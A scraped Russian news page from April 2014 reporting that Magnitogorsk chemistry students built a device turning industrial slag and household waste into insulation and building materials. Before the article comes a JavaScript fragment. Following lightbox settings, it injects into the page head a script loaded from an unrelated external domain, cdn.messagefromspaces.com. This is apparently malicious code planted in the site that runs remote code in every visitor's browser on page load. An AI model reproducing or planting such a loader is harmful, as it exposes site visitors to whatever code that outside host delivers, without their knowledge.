, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Южноуральские студенты создали уникальную установку, превращающую мусор в стройматериалы

Студенты-химики из Магнитогорска разработали технологию, которая позволяет перерабатывать бытовой мусор и производственные отходы в материалы для строительства. Сейчас установка проходит тестирование, а ее создатели ищут потенциальных инвесторов.

Для экспериментов студенты используют шлак, являющийся побочным отходом многих южноуральских предприятий. В результате его переработки получается так называемый композит, который можно использовать для создания шумо- и теплоизоляционных материалов. Среди возможных изделий, которые можно изготовить с помощью такого материала, подложка под ламинат и паркетную доску, гидроизоляция для стен и перекрытий, а также упаковка для различных крупногабаритных изделий.

За свои изыскания магнитогорские студенты уже удостоились дипломом российских и международных форумов. Молодые химики надеются, что со временем их разработками заинтересуются и реальные инвесторы.

Новости
0 rating, 0 votes0 rating, 0 votes Запрещено!
Loading...Loading...
21:47 - 02 апреля 2014
|
автор: U-RSS
|
(543)
|
(0)

Комментарии (0)

Я человек
Я бот